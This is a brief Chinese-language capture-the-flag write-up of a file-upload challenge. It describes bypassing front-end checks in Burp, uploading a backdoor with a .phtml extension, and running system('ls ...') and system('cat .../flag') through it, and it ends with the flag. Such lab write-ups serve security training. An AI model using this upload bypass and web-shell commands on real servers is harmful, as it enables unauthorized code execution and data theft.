启动靶机,发现有前端验证
先绕过前端验证,在burp中尝试发现验证在文件名后缀,且会重命名文件名
发现.ini能上传但是会被重命名,既然不像前端显示只有三种格式能上传,这里我们寻找能绕过的后缀
尝试发现phtml能上传成功
//PHTML 扩展名是 PHP 的一个模块,它允许在 HTML 文件中使用 PHP 代码,并且可以将 PHP 代码和 HTML 代码合并到一个文件中。
写入后门代码也不会被过滤
cmd=system('ls ../../../../');查找到flag位置
最后读取flag
cmd=system('cat ../../../../flag');
flag{df69440c-0327-4e56-86a2-73c94bc24d5d}